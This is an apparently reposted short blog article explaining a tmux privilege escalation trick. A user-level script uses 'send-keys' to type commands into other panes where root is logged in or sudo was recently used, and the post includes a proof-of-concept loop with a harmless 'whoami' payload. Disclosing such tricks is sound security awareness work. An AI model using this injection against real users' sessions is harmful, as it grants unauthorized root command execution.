tmux Privilege Escalation
source link: https://www.tuicool.com/articles/7Jnm2ya
Go to the source link to view the article. You can view the picture content, updated content and better typesetting reading experience. If the link is broken, please click the button below to view the snapshot at that time.
tmux privilege escalation abusing send-keys
A script run as user in tmux can under some circumstances execute commands as root.
tl;dr
Did you know you can send keystrokes to other panes in tmux?
You can abuse send-keys to send commands to a root/sudo pane.
That's all there is to it, that's the trick.
send-keys
There's a tmux feature to send keystrokes to a pane.
tmux send-keys -t $pane 'C-c'
for example sends SIGINT to whatever is running in pane $pane.
man tmux
When I sae the send-keys feature, I was like:
"What if theres another pane, where the user is logged in as root?"
poc||gtfo
preparations
tmux tmux sp su # login as root
Now go back to the other tmux pane (where you are logged in as user).
action
Now run the following script, to execute whoami
in every pane:
#!/bin/sh for pane in `tmux list-panes | grep -Po '^\d'`; do tmux send-keys -t $pane 'C-c' tmux send-keys -t $pane 'whoami '; done;
You will see, as expected, the command whoami
returned root.
sudo
With the same trick you can abuse that sudo
was used in another pane.
tmux send-keys -t $pane 'sudo whoami ';
. . /
Recommend
About Joyk
Aggregate valuable and interesting links.
Joyk means Joy of geeK